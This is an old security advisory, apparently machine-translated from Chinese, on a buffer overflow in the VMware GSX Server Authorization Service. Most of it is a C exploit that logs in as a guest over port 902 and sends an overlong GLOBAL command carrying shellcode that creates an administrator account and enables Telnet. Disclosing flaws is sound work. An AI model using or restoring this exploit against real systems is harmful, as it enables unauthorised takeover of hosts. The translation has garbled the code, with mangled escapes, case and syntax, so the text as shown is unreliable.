VMware GSX Server Remote Buffer Overflow Vulnerability
Create time: 2002-07-24
Article attribute: original
Article submission:
ZAG23 (Bigball_at_venustech.com.cn)
Author: zag & glcs
Date: 2002/07/24
Affected system:
VMware GSX Server 2.0.0 Build-2050 for Windows (Other Versions have not been tested)
Windows NT / 2000 / XP
Vulnerability Description:
VMware GSX Server is a very popular virtual PC software, its far access management service:
VMware Authorization Service exists a buffer overflow problem, although the program is designed
It has been made to prevent buffer overflow processing, but due to its design defect, the overflow can still be utilized
Enhance any account as administrator privileges to perform any code.
Vulnerability analysis:
(Thanks to ISNO to leave me a lot of overflow reference materials)
VMware GSX Server communicates with VMware Remote Console is actually passed
VMware Authorization Service open 902 port with VMware Remote Console
Connected, the handshake operation before the data communication is as follows:
220 VMware Authentication Daemon Version 1.00
User Anyuser
331 Password Required for User.
Pass ******
230 User Logged in.
Global Server
200 Connect Global
User, pass, and global commands have been limited to the length, and when the string is too long, it will be disconnected.
And return to similar 599 VMware-Authd Panic: Buffer overflow in vMauthdsocketRead ()
Message:
220 VMware Authentication Daemon Version 1.00
User aaaa .... (AX500)
599 VMware-Authd Panic: Buffer overflow in vMauthdsocketRead ()
However, the global command has been overflow when using a string that does not exceed the defined length.
Spillage will cause the VMware Authorization Service to end, we can construct a short
Shellcode to overwrite its return address to perform our code.
Now assume that you already have a Guest account, we have written the following test code:
// vmwareoverflowtest v1.0
// Written by Zag & Glcs
// bigball@venustech.com.cn Glcs@venustech.com.cn
//
http://www.venustech.com
#include "stdio.h"
#include "winsock2.h"
#include "stdlib.h"
#pragma comment (Lib, "WS2_32")
In order to guarantee the shellcode code length Global instruction length will not exceed the maximum character limit, we
The following is a shortest SHELLCODE.
// Add administrator account: x_adrc password: x_adrc
/ / Open Telnet service
Unsigned char shellcode [] =
"/ x68 / xc1 / x15 / x35 / x09 / x81 / x2c / x24"
"/ x80 / xd1 / xf0 / x08 / x68 / x63 / x20 / x20"
"/ x2f / x68 / x5f / x61 / x64 / x72 / x68 / x72"
"/ x73 / x20 / x78 / x68 / x72 / x61 / x74 / x6f" / x68 / x6e / x69 / x73 / x74 / x68 / x61 / x64 "
"/ x6d / x69 / x68 / x6f / x75 / x70 / x20 / x68"
"/ x61 / x6c / x67 / x72 / x68 / x20 / x6c / x6f"
"/ x63 / x68 / x26 / x6e / x65 / x74 / x68 / x74"
"/ x73 / x76 / x72 / x68 / x20 / x74 / x6c / x6e"
"/ x68 / x74 / x61 / x72 / x74 / x68 / x65 / x74"
"/ x20 / x73 / x68 / x44 / x44 / x26 / x6e / x68"
"/ x63 / x20 / x2f / x41 / x68 / x5f / x61 / x64"
"/ x72 / x68 / x72 / x63 / x20 / x78 / x68 / x78"
"/ x5f / x61 / x64 / x68 / x73 / x65 / x72 / x20"
"/ x68 / x65 / x74 / x20 / x75 / x68 / x2f / x63"
"/ x20 / x6e / x68 / x63 / x6d / x64 / x20 / x8b"
"/ XC4 / X6A / X01 / X50 / XB8 / XC6 / X84 / XE6"
"/ x77 / xff / xd0 / x90";
Unsigned char JMP_ESP_XP_ENG [] = {0x1B, 0x17, 0XE3, 0X77}; // WinXP ENG
Unsigned char JMP_ESP [4];
Void usage ()
{
Printf ("VMwareOverflowTest V1.0 / N Written by ZAG & GLCS / N email: bigball@venustech.com.cn/n Glcs@venustech.com.cn/n
Www.venustech.com/n/nusage :vmwareoverflowtest.exe
Return;
}
INT main (int Argc, char ** argv)
{
Char Str [4096];
WSADATA WSA;
Socket sock;
Struct SockAddr_in Server;
int R;
INT i = 0;
IF (argc! = 6)
{
USAGE ();
Return 0;
}
WSASTARTUP (Makeword (2, 2), & WSA);
SOCK = Socket (AF_INET, SOCK_STREAM, IPPROTO_TCP);
Server.sin_family = af_INet;
Server.sin_port = HTONS (ATOI (ARGV [2]));
Server.sin_addr.s_addr = inet_addr (argv [1]);
Switch (ATOI (Argv [5]))))))
{
Case 0:
Shellcode [133] = 0xc6;
Shellcode [134] = 0x84;
Shellcode [135] = 0xE6;
Shellcode [136] = 0x77;
STRCPY (JMP_ESP, JMP_ESP_XP_ENG);
Break;
DEFAULT:
Shellcode [133] = 0xc6;
Shellcode [134] = 0x84;
Shellcode [135] = 0xE6; Shellcode [136] = 0x77;
STRCPY (JMP_ESP, JMP_ESP_XP_ENG);
Break;
}
RET = Connect (Sock, (Struct SockAddr *) & Server, SIZEOF (Server);
IF (RET == Socket_ERROR)
{
Printf ("Connect Error / N");
Return -1;
}
MEMSET (STR, 0, SIZEOF (STR));
RECV (SOCK, STR, 100, 0);
Printf ("% s", str);
MEMSET (STR, 0, SIZEOF (STR));
STRCPY (STR, "User");
STRCAT (STR, Argv [3]);
STRCAT (STR, "/ R / N");
Ret = Send (Sock, Str, Strlen (STR), 0);
MEMSET (STR, 0, SIZEOF (STR));
RECV (SOCK, STR, 100, 0);
Printf ("% s", str);
MEMSET (STR, 0, SIZEOF (STR));
STRCPY (STR, "pass");
STRCAT (STR, Argv [4]);
STRCAT (STR, "/ R / N");
Ret = Send (Sock, Str, Strlen (STR), 0);
MEMSET (STR, 0, SIZEOF (STR));
RET = Recv (SOCK, STR, 100, 0);
Printf ("% s", str);
MEMSET (STR, 0, SIZEOF (STR));
STRCPY (STR, "Global");
// Semi-continuously covered method, no precise positioning spillout
For (i = 7; i <288; i = 8)
{
Memcpy (STR I, "/ X90 / X90 / X58 / X68", 4);
Memcpy (STR i 4, JMP_ESP, 4);
}
Memcpy (STR I, Shellcode, Strlen (shellcode);
STRCAT (STR, "/ R / N");
Ret = Send (Sock, Str, Strlen (STR), 0);
Printf ("DONE! / N");
CloseSocket (SOCK);
WSACLEANUP ();
Return 1;
}
After compiling this code under the VC, use the user: x_adrc pass: x_adrc remote telnet to the target host,
Check the x_adrc account, will find x_adrc belong to an administrator group. At this time, the administrator has been obtained by any account.
Permission.
Related reference:
YUANGE << WideChar string buffer overflow attack technology >> Mid-range continuous coverage related chapters
about Us:
Beijing Queen Star - Active Defense Research Center (Venustech-ADRC)
